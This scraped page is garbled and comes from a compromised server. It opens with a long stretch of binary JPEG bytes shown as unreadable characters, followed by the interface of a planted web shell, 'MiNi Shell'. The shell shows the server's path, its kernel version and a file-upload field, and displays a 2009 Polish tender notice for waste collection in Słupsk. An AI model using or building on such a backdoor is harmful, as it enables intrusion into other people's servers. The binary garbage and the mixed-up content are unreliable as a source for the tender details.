JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090324/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090324/75714-N-2009.html

<p class="kh_header"><b>Słupsk: Wywóz  nieczystości  stałych  oraz  zbiórka   surowców 
wtórnych     z     zasobów     mieszkaniowych      Słupskiego     TBS
zlokalizowanych  przy  ulicach   Fałata   i   Szafranka  w  Słupsku.</b><br>
<b>Numer ogłoszenia: 75714 - 2009; data zamieszczenia: 24.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Słupskie Towarzystwo Budownictwa Społecznego Spółka z o.o. , ul. Fałata 11, 76-200 Słupsk, woj. pomorskie, tel. 059 8456091, 605 089555, faks 059 8456091.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.stbs.slupsk.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wywóz  nieczystości  stałych  oraz  zbiórka   surowców 
wtórnych     z     zasobów     mieszkaniowych      Słupskiego     TBS
zlokalizowanych  przy  ulicach   Fałata   i   Szafranka  w  Słupsku..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem  zamówienia  jest  wykonanie  usługi  w  zakresie  wywozu  
    nieczystości stałych   oraz     zbiórki     surowców    wtórnych    z    
    zasobów      mieszkaniowych Słupskiego TBS   zlokalizowanych przy ulicach  
    Fałata  i  Szafranka w Słupsku.
2. Zakres przedmiotu zamówienia  obejmuje:
   2.1.  Wywóz nieczystości stałych (odpadów komunalnych) z zasobów 
          mieszkaniowych Słupskiego  TBS   przy   ul .  Fałata.  i  Szafranka  w   
          Słupsku  z   częstotliwością zapobiegającą   przepełnieniu   pojemników,    
          lecz  nie   rzadziej   niż   trzy   razy   w  tygodniu. 
          Objęta postępowaniem usługa obejmuje: 
           a)  usuwanie  zgromadzonych   nieczystości   stałych   (odpadów    
               komunalnych ) z  częstotliwością  zapobiegającą  przepełnieniu  
               pojemników,  lecz nie  rzadziej niż  trzy razy w tygodniu. 
           b) ustawienie pojemników w formie dzierżawy - pojemniki typ: SM-1100 - 
               18 szt.
          c)  mycie i dezynfekcja pojemników w okresie letnim obligatoryjnie raz w 
               miesiącu w  okresie  od 1 maja do 30  września  w każdym  roku  
               obowiązywania umowy, oraz (awaryjnie)  w miarę  potrzeb w  
               niemożliwych do przewidzenia sytuacjach, na   telefoniczne    
               zgłoszenie Zamawiającego. (mycie za pomocą myjni                
               przystosowanej  do  tego  typu  pojemników)
          d)  naprawa   pojemników    uszkodzonych  wskutek eksploatacji, lub 
               uszkodzonych z winy Wykonawcy.
          e)  oczyszczanie  miejsca   zanieczyszczonego  przy  załadunku odpadów 
               na  pojazd 
          f)   przy   wywozie  nieczystości    usuwanie   wszystkich   odpadów    
               komunalnych zgromadzonych  na  placu   gospodarczym  obok  
               pojemników.  
  2.2.  Selektywna  zbiórka  odpadów   poprzez   ustawienie   pojemników   na  
         surowce wtórne (papier, szkło, plastyk) i bezpłatny ich wywóz.  
         -  3 komplety pojemników.
  2.3.  Wywóz   odpadów wielkogabarytowych po zgłoszeniu telefonicznym
         Zamawiającego  w  ciągu  2  dni.
  2.4.  Zamawiający przewiduje  ustawienie:
         a)  przy ul. Fałata:   - 7 szt. pojemników typu  SM - 1100
                                     - 2 komplety pojemników do selektywnej zbiórki   
                                          odpadó
         b)  przy ul. Szafranka:  - 11 szt. pojemników typu SM - 1100
                                         - 1 komplet pojemników do selektywnej zbiórki 
                                           odpadów
         Pojemniki zostaną ustawione w miejscach wskazanych przez Zamawiającego.
  2.5.  Zamawiający  1 raz na kwartał danego roku ( najpóźniej do dnia  10 miesiąca
         rozpoczynającego kwartał ) dostarczy  na piśmie  do Wykonawcy  informację
         o  ilości  osób  na poszczególnych osiedlach, tj.  ilość mieszkańców i  ilość 
         osób zatrudnionych  w lokalach usługowych.
  2.6.  Na dzień ogłoszenia przetargu w zasobach mieszkaniowych Słupskiego TBS
         zamieszkuje 993  mieszkańców.
         W lokalach usługowych zatrudnionych jest  41 osób.
  2.7.   Zamawiający   przewiduje  zwiększenie  ilości  lokatorów o około 175 
          w związku, z   planowanym  oddaniem do użytku  w listopadzie 2009 r. 
          68 mieszkań  w  budynkach  mieszkalnych  przy ul. Narutowicza w Słupsku.
  2.8.  We   wrześniu   2011 r.   Zamawiający    przewiduje   oddanie  do  użytku  
         100 mieszkań w budynkach mieszkalnych przy ul. Szafranka w Słupsku tj.  
         około 255 mieszkańców..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 90.00.00.00-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 48.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający  nie wymaga  wniesienia wadium oraz zabezpieczenia należytego 
 wykonania umowy.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O zamówienie mogą ubiegać się Wykonawcy, którzy:
-  spełniają wymagania określone w art. 22  prawa zamówień  publicznych,
-  nie    podlegają   wykluczeniu  z  postępowania  na  podstawie  art. 24 prawa 
    zamówień publicznych,
-  posiadają   uprawnienia   do   wykonywania   określonej   działalności   lub    
    czynności, jeżeli  ustawy nakładają obowiązek posiadania takich uprawnień,
-  posiadają   niezbędną   wiedzę  i  doświadczenie  oraz    potencjał   techniczny,  
   a także  dysponują  osobami zdolnymi do wykonania zamówienia,lub 
   przedstawią pisemne zobowiązanie innego podmiotu do udostępnienia potencjału 
   technicznego i osób zdolnych  do wykonania zamówienia
-  znajdują   się   w   sytuacji    ekonomicznej   i   finansowej   zapewniającej    
   wykonanie zamówienia, 
- spełniają następujące wymagania dodatkowe : 
   - zobowiązują   się   do   składowania   odpadów   komunalnych   tylko  i  
      wyłącznie na wysypisku śmieci w miejscowości  Bierkowo  k/Słupska,
   -  dysponują  własnym  sprzętem  niezbędnym  do wykonania  zamówienia,  tj:
                * minimum dwa sprawne dopuszczone do ruchu samochody bezpylne,
                * minimum dwa sprawne dopuszczone do ruchu pojazdy z żurawikiem
                   przystosowane do wywozu odpadów ze zbiórki selektywnej,
                * minimum jeden samochód z urządzeniami przystosowanymi do mycia
                  i dezynfekcji pojemników. 
          oraz  spełnią  wszystkie  wymagania  określone  w  niniejszej  specyfikacji..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Wykonawcy,   w   celu   potwierdzenia   spełnienia    warunków    udziału   w    postępowaniu zobowiązani  są wraz  z ofertą  złożyć:
1.  Wypis z Sądu Gospodarczego-Wydziału Rejestrowego lub Krajowego Rejestru  
     Sądowego  (dla spółek  prawa handlowego),  lub  aktualny  dokument   
     potwierdzający   prowadzenie  działalności gospodarczej   (pozostałe  
     podmioty).  Za  ważny   przyjmuje   się   dokument  wystawiony   lub  
     potwierdzony  przez  organ  wystawiający   nie   wcześniej   niż   sześć 
     miesięcy  od  terminu  składania  ofert.
2.  Aktualne  zaświadczenie z Urzędu  Skarbowego o wywiązaniu  się z obowiązku 
     opłacania podatków związanych  z działalnością Wykonawcy .  Za ważny  
     przyjmuje się  dokument wystawiony nie wcześniej niż trzy miesiące przed 
     upływem terminu składania ofert.
3.  Aktualne zaświadczenie  ZUS-u  o wywiązywaniu się z  obowiązku  opłacania 
     składek na ubezpieczenie społeczne. Za aktualny przyjmuje się dokument 
     wystawiony nie wcześniej  niż  trzy miesiące przed upływem terminu składania 
     ofert.
4.   Informacja z Centralnego Rejestru Skazanych na temat karalności Wykonawcy. 
      W przypadku gdy Wykonawca jest : 
      - osobą prawną - informacja winna dotyczyć aktualnych członków władz,
      - spółka jawna - informacja winna dotyczyć aktualnych wszystkich   
                             wspólników  spółki,
      - spółka  partnerska  -  informacja  winna   dotyczyć  aktualnych  partnerów i  
                                      członków   zarządu spółki, 
      - spółka  komandytowa lub spółka  komandytowo-akcyjna -  informacja  winna 
                                  dotyczyć aktualnych komplementariuszy 
                                  spółki.                                                                    
5.    Informacja z Krajowego Rejestru Karnego o podmiocie zbiorowym.(Artykuł 24 
      ust. 1    Pkt.  9 ustawy Prawo Zamówień 
      Publicznych)                                                           
6.   Polisa   lub   inne   dokumenty   ubezpieczenia   potwierdzające  , że   
      Wykonawca     jest ubezpieczony  od   odpowiedzialności    cywilnej  w  
      zakresie  prowadzonej   działalności gospodarczej.    
7.  Aktualną  ważną  umowę  z  miejskim  składowiskiem  śmieci  w miejscowości  
     Bierkowo   na   przyjęcie  stałych  odpadów komunalnych ,  lub oświadczenie   
     że  jest    właścicielem składowiska.
8. Oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu  
    złożone na załączniku  Nr 2   wraz   z  dokumentami potwierdzającymi  
    spełnienie   tych  warunków.
9. Wypełniony  formularz  OFERTY  zawierający  oferowaną  cenę wraz  z 
    oświadczeniami  sporządzony na załączniku   Nr 1.
10.   Kserokopię  o nadaniu  Wykonawcy  numerów REGON oraz  NIP.
11. Podpisany WZÓR  UMOWY  załącznik  Nr  3.
12. Udokumentowany wykaz  sprzętu wymaganego do realizacji przedmiotu 
     zamówienia.  ( dowód rejestracyjny i karta pojazdu)
13. Wykaz wykonywanych usług dotyczących wywozu nieczystości  w okresie 
     trzech lat  tj: w  latach 2006,2007, 2008 wraz z  dokumentami 
     potwierdzającymi że usługi zostały wykonane należycie. W wykazie powinny 
     być zawarte informacje o Zamawiającym, miejsce gdzie usługa była 
     wykonywana i określenie  wartości wykonanej usługi.
Uwaga.   Dołączone dokumenty powinny być złożone w formie oryginału lub 
kserokopii poświadczonej za zgodność z oryginałem przez Wykonawcę  
lub osobę uprawnioną przez Wykonawcę do składania oświadczeń woli 
w imieniu Wykonawcy..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.stbs.slupsk.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> SŁUPSKIE TOWARZYSTWO BUDOWNICTWA SPOŁECZNEGO - Spółka z o.o. z siedzibą w Słupsku
76-200   SŁUPSK ul. Fałata 11.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.04.2009 godzina 10:30, miejsce: SŁUPSKIE TOWARZYSTWO BUDOWNICTWA SPOŁECZNEGO - Spółka z o.o. z siedzibą w Słupsku
76-200   SŁUPSK ul. Fałata 11 
Sekretariat.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com